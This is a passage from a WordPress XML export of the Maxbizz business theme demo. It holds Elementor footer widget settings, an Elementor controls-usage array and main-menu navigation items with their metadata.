Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":false},{"id":"0c63cfe","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"36a2873","elType":"widget","settings":{"title":"Subscribe","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e349af9","elType":"widget","settings":{"wp":{"title":""},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-mc4wp_form_widget"},{"id":"b95d22f","elType":"widget","settings":{"editor":"<p>Subscribe to our newsletter. Be always in trend!<\/p>","text_color":"#C0C1C2"},"elements":[],"widgetType":"text-editor"}],"isInner":false}],"isInner":false},{"id":"de9425d","elType":"section","settings":{"background_background":"classic","background_color":"#1E1E1E"},"elements":[{"id":"5c90953","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"7456be1","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"0bb002f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"23f3334","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#929399","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:3;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:2:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_text_style";a:5:{s:10:"text_color";i:2;s:16:"text_color_hover";i:2;s:11:"text_indent";i:2;s:26:"icon_typography_typography";i:2;s:25:"icon_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:3:"gap";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:27:"wp-widget-mc4wp_form_widget";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1552/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1552/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1552</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1552]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>20</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1555]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[959]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1553/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1553/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1553</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1553]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>19</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1555]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[898]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services-2/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/our-services-2/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1554</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>5</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1433]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[885]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/services/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/services/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1555</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>18</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1556/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1556/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1556</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1556]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>16</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1557]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[861]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/portfolio/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1557</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>13</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1558/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1558/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1558</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1558]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>15</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1557]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[858]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services-1/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/our-services-1/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1559</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>4</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1433]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/1560/</link>
		<pubDate>Mon, 02 Nov 2020 04:03:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/2020/11/02/1560/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1560</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 04:03:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 04:03:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1560]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
